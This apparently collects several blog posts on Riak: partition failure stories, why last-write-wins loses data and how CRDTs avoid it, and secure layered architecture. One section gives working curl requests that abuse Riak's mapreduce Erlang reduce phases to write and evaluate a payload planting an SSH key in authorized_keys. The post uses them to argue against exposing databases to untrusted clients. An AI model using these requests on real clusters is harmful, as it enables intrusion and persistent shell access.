It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(a, a) = a. It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.
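You can check those properties mechanically. A quick property test in Python; a sketch only, and the tie-breaking rule here is mine, though real implementations also break timestamp ties deterministically:

import random

def lww(a, b):
    # (timestamp, value) pairs: highest timestamp wins, ties broken by
    # value so the merge is deterministic.
    return max(a, b)

versions = [(random.randint(0, 10), v) for v in "abcdefgh"]

for _ in range(10_000):
    a, b, c = random.sample(versions, 3)
    assert lww(a, lww(b, c)) == lww(lww(a, b), c)   # associative
    assert lww(a, b) == lww(b, a)                   # commutative
    assert lww(a, a) == a                           # idempotent

All three assertions pass, every time. Monotonicity isn't the problem.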

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.

Or you could use OR-sets. It’s 130 lines of Ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.
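Here's roughly what that looks like as a sketch in Python instead of Ruby. Tags are random UUIDs; a real implementation also needs serialization and, eventually, garbage collection of removed tags.

import uuid

class ORSet:
    """Observed-remove set: each add gets a unique tag, and removes only
    delete the tags they have actually observed, so a concurrent add
    always survives a concurrent remove."""

    def __init__(self):
        self.adds = {}      # element -> set of add tags
        self.removes = {}   # element -> set of tags known to be removed

    def add(self, element):
        self.adds.setdefault(element, set()).add(uuid.uuid4().hex)

    def remove(self, element):
        observed = self.adds.get(element, set())
        self.removes.setdefault(element, set()).update(observed)

    def value(self):
        return {e for e, tags in self.adds.items()
                if tags - self.removes.get(e, set())}

    def merge(self, other):
        for e, tags in other.adds.items():
            self.adds.setdefault(e, set()).update(tags)
        for e, tags in other.removes.items():
            self.removes.setdefault(e, set()).update(tags)

# A remove on one side, a concurrent re-add on the other: after merging
# in both directions, both replicas agree, and the add wins.
a, b = ORSet(), ORSet()
a.add("@scoblizer")
b.merge(a); b.remove("@scoblizer")
a.add("@scoblizer")
a.merge(b); b.merge(a)
print(a.value() == b.value() == {"@scoblizer"})   # True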

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \
  http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]
 ],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         // "/tmp/evil.erl"
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "write_file",
     "arg": "
       SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n
       SSH = SSHDir ++ \"authorized_keys\".\n
       filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n
       file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n
       file:change_mode(SSHDir, 8#700).\n
       file:change_mode(SSH, 8#600).\n
       file:delete(\"/tmp/evil.erl\").
     "
   }}
 ]
}
EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.
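Those integers are just character codes. In Python, for instance:

print(bytes([47,116,109,112,47,101,118,105,108,46,101,114,108]).decode())
# => /tmp/evil.erl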

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_keys.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "path_eval",
     "arg": "/tmp/evil.erl"
   }}
 ]
}
EOF

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

As a part of the exciting series of events (long story...) around our Riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down, mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.


[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the prescribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. OAuth providers (like Facebook and Twitter), or OpenID, also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have fewer ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usernames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Let's sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, executes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.
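As a sketch of what that validation layer might look like in Python: the request object and the bucket_owner lookup are hypothetical, and the point is the whitelist shape, not the exact code.

import re

# Whitelist: only simple GETs and PUTs on /riak/<bucket>/<key> pass
# through. Everything else (mapreduce, link walking, list-keys, admin
# endpoints) is rejected outright.
ALLOWED_METHODS = {"GET", "PUT"}
KEY_PATH = re.compile(r"^/riak/([\w-]+)/([\w-]+)$")

def validate(request, current_user, bucket_owner):
    """request is a hypothetical object with .method and .path;
    bucket_owner(bucket) consults the bucket service. Returns the
    (bucket, key) to forward to Riak, or raises."""
    if request.method not in ALLOWED_METHODS:
        raise PermissionError("method not allowed")
    m = KEY_PATH.match(request.path)
    if not m:
        raise PermissionError("only plain key access is allowed")
    bucket, key = m.groups()
    owner = bucket_owner(bucket)
    if owner is not None and owner != current_user:
        raise PermissionError("bucket belongs to someone else")
    return bucket, key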

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)
